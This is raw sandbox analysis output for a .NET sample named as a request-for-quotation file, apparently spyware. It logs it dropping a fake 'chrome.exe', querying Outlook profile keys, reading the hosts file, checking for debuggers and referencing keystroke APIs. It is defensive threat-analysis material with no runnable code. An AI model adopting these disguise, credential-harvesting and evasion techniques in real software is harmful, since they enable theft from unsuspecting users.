                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B13980
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B3B220
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AADA80
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B993DC
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8A76BA0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8A74B50
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B5DB20
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8BE1CE0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AAE4B0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B3DC90
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8A76C80
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B395A0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B665D0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AA4540
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AB0540
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8A75D90
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8C05550
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8A77D60
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AB96A0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8C0CEC0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B5A630
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B5AFE0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B65FA0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AE9780
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B3E8B0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AC60E0
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: String function: 00007FF7A8A9AED0 appears 36 times
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: String function: 00007FF7A8BBD690 appears 39 times
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 0_2_01722F68 CreateProcessAsUserA,
                  Source: RFQ__637456464647.exeBinary or memory string: OriginalFilename vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.292339706.00000000032C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000002.316474597.000000000174A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.298522029.000000000174A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exeBinary or memory string: OriginalFilename vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000001.00000000.267745770.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYFGGCVyufgtwfyuTGFWTVFAUYVF.exeX vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exe, 00000001.00000002.527555148.0000000000F37000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs RFQ__637456464647.exe
                  Source: RFQ__637456464647.exeBinary or memory string: OriginalFilenameJxIIaRUTvaLxexPWTLbbe.exe4 vs RFQ__637456464647.exe
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: chrome.exe.0.drStatic PE information: Number of sections : 11 > 10
                  Source: RFQ__637456464647.exeReversingLabs: Detection: 46%
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Users\user\Desktop\RFQ__637456464647.exeJump to behavior
                  Source: RFQ__637456464647.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\RFQ__637456464647.exe "C:\Users\user\Desktop\RFQ__637456464647.exe"
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\Desktop\RFQ__637456464647.exe C:\Users\user\Desktop\RFQ__637456464647.exe
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1296
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\Desktop\RFQ__637456464647.exe C:\Users\user\Desktop\RFQ__637456464647.exe
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
                  Source: chrome.exe.0.drBinary string: HKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXTHKEY_CURRENT_CONFIGHKEY_DYN_DATA\Device\\Device\HarddiskVolumeverifier.dllKeyg_handles_to_closesbox_alternate_desktop_local_winstation_0x%X
                  Source: chrome.exe.0.drBinary string: CreateAppContainerProfileuserenvDeriveAppContainerSidFromAppContainerNameGetAppContainerRegistryLocationGetAppContainerFolderPath\\.\pipe\%ls\%ls@g_interceptionsntdll.dllg_originalsg_ntntdll.dllNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenExkernel32.dll\Device\
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/5@2/2
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 1.0.RFQ__637456464647.exe.8f0000.13.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 1.0.RFQ__637456464647.exe.8f0000.0.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 0.2.RFQ__637456464647.exe.d20000.0.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 1.0.RFQ__637456464647.exe.8f0000.11.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 1.0.RFQ__637456464647.exe.8f0000.1.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 0.0.RFQ__637456464647.exe.d20000.0.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: RFQ__637456464647.exe, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u000fu0005/u0095u0005.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8BDA170 FormatMessageA,GetLastError,
                  Source: RFQ__637456464647.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6312
                  Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
                  Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
                  Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
                  Source: chrome.exeString found in binary or memory: Try '%ls --help' for more information.
                  Source: RFQ__637456464647.exe, u0097/u0005u0002.csCryptographic APIs: 'CreateDecryptor'
                  Source: RFQ__637456464647.exe, u0097/u0005u0002.csCryptographic APIs: 'TransformFinalBlock'
                  Source: RFQ__637456464647.exe, u001a/u0094u0008.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u0097/u0005u0002.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u0097/u0005u0002.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u001a/u0094u0008.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u0097/u0005u0002.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u0097/u0005u0002.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u001a/u0094u0008.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: RFQ__637456464647.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: RFQ__637456464647.exeStatic file information: File size 2844160 > 1048576
                  Source: RFQ__637456464647.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RFQ__637456464647.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2b5a00
                  Source: RFQ__637456464647.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: System.Windows.Forms.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdbRSDSD source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: k,C:\Windows\System.pdb source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.Windows.Forms.pdbxT source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.ni.pdbRSDS source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: 7.PDB source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\RFQ__637456464647.PDB source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: .pdb, source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.pdbP>Q source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: C:\Users\user\Desktop\RFQ__637456464647.PDB6 source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: chrome.exe.pdb source: RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.dr
                  Source: Binary string: System.Core.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_054D9B97 push B000005Eh; iretd
                  Source: chrome.exe.0.drStatic PE information: section name: .00cfg
                  Source: chrome.exe.0.drStatic PE information: section name: .retplne
                  Source: chrome.exe.0.drStatic PE information: section name: CPADinfo
                  Source: chrome.exe.0.drStatic PE information: section name: _RDATA
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B391C0 GetSystemTimeAsFileTime followed by cmp: cmp rdi, 13h and CTI: jc 00007FF7A8B39523h
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8AA4330 GetCurrentThread,IsDebuggerPresent,GetModuleHandleW,GetProcAddress,_Init_thread_footer,GetCurrentThreadId,RaiseException,
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeCode function: 1_2_06482D81 LdrInitializeThunk,
                  Source: C:\Users\user\Desktop\RFQ__637456464647.exeMemory allocated: page read and write | page guard
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B13980 SetUnhandledExceptionFilter,K32GetPerformanceInfo,K32GetProcessMemoryInfo,GetProcessHandleCount,
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8A77D60 SetUnhandledExceptionFilter,SetConsoleCtrlHandler,_Init_thread_footer,SetProcessShutdownParameters,GetLastError,
                  Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 5_2_00007FF7A8B9AFA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: RFQ__637456464647.exe, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Source: 0.0.RFQ__637456464647.exe.d20000.1.unpack, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Source: 0.0.RFQ__637456464647.exe.d20000.4.unpack, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Source: 0.0.RFQ__637456464647.exe.d20000.0.unpack, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Source: 0.2.RFQ__637456464647.exe.d20000.0.unpack, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Source: 1.0.RFQ__637456464647.exe.8f0000.0.unpack, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Source: 1.0.RFQ__637456464647.exe.8f0000.11.unpack, u000fu0005/u000eu0005.csReference to suspicious API methods: ('?\\x04', 'GetProcAddress@kernel32')
                  Source: 1.0.RFQ__637456464647.exe.400000.12.unpack, ufffdW?ufffd?/u061d????.csReference to suspicious API methods: ('???Z?', 'MapVirtualKey@user32.dll')
